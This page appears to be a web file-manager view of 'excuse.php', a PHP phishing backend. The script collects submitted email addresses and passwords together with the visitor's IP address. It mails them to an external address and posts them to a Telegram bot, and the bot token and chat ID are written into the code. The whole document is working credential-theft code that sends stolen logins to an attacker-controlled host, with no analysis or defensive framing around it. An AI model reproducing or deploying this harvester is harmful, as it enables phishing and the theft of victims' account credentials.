OwlCyberSecurity - MANAGER
Edit File: excuse.php
<?php $ip = getenv("REMOTE_ADDR"); if(!empty($_POST)) { $email= $_POST['email']; $password = $_POST['password']; $to = "info.touring.gy@mail.com"; $TGBO1 = '8825972456:AAHtmC6grKh15pcMGjWFOz9XcxGM4KwS1w4'; //Telegram Bot Token $cID1 = '7928928571'; //Telegram ChatID $subject = "Cham 24 logs : $email $ip"; $message = "Email ID : ".$email."\r\n"; $message .= "Password : ".$password."\r\n"; $message .= "IP : ".$ip."\r\n"; $header = "Content type: Street Vibes \r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html\r\n"; mail ($to,$subject,$message,$header); // Telegram Code $data = ['text' => $message,'chat_id' => $cID1]; $website="https://api.telegram.org/bot$TGBO1"; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($data)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } ?>